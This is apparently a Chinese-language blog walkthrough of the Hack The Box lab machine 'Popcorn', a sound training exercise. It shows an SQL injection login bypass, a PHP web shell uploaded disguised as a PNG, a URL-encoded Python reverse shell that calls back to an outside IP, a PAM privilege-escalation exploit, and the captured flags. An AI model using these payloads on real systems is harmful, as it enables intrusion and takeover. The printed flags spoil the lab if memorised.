[Meachines] [Medium] Popcorn SQLI+Upload File+PAM…

2024-08-25 143 0

信息收集

IP Address Opening Ports
10.10.10.6 TCP:22,80

$ nmap -p- 10.10.10.6 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp    open     http        Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI & 文件上传

# echo '10.10.10.6 popcorn.htb'>>/etc/hosts

$ feroxbuster --url http://popcorn.htb/

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图

http://popcorn.htb/torrent/login.php

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图1

username:admin' or '1'='1
password:xxx

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图2

http://popcorn.htb/torrent/torrents.php?mode=upload

$ wget https://cdimage.kali.org/kali-2024.2/kali-linux-2024.2-installer-amd64.iso.torrent -O 1.torrent

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图3

http://popcorn.htb/torrent/torrents.php?mode=details&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图4

popcorn.htb/torrent/edit.php?mode=edit&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图5

POST /torrent/upload_file.php?mode=upload&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc HTTP/1.1
Host: popcorn.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------356668434211973508953699136894
Content-Length: 378901
Origin: http://popcorn.htb
Connection: close
Referer: http://popcorn.htb/torrent/edit.php?mode=edit&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc
Cookie: /torrent/login.php=; saveit_0=1; saveit_1=0; /torrent/torrents.php=; /torrent/=; /torrent/index.php=; /torrent/torrents.phpfirsttimeload=0; PHPSESSID=8d214a4d51e6d9b98fb3d5ea8cec6e45
Upgrade-Insecure-Requests: 1

-----------------------------356668434211973508953699136894
Content-Disposition: form-data; name="file"; filename="Screenshot 2024-08-16 182829.png.php"
Content-Type: image/png

<?php system($_GET[1]);phpinfo();?>
-----------------------------356668434211973508953699136894
Content-Disposition: form-data; name="submit"

Submit Screenshot
-----------------------------356668434211973508953699136894--

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图6

http://popcorn.htb/torrent/upload/

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图7

http://popcorn.htb/torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.php?1=dir

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图8

$ curl 'http://popcorn.htb/torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.php?1=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.16.24%22%2C10032%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27'

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图9

User.txt

5cdfb68827912b249896490a60bf420c

权限提升

$ uname -a

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图10

使用 ls -lAR /home/george命令显示了 .cache 目录下一个不常见的文件 motd.legal-displayed。经过一些研究,发现 Exploit-DB 14339 提到 PAM 1.1.0 存在一个文件篡改的特权升级漏洞。通过这个漏洞,可以在目标机器上执行脚本以获得 root 权限。请注意,需要一个交互式的 shell,可以通过在非交互式 shell 中运行命令 python -c 'import pty; pty.spawn("/bin/sh")' 来获取。可以从 /root/root.txt 获取 root 标志。

motd.legal-displayed 是 PAM(Pluggable Authentication Modules)相关的一个文件,用于存储关于“Message of the Day”(MOTD,登录欢迎信息)的法律声明或其他类似信息。在某些 PAM 配置中,它可能用于记录用户是否已经查看过这些信息,以便在用户每次登录时进行相关的提示或处理。

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图11

https://www.exploit-db.com/exploits/14339

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图12

$ chmod +x exp.sh

$ ./exp.sh

[Meachines] [Medium]  Popcorn SQLI+Upload File+PAM…插图13

Root.txt

d87c02b4781a36f55ea99c8c8fbf4d20


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论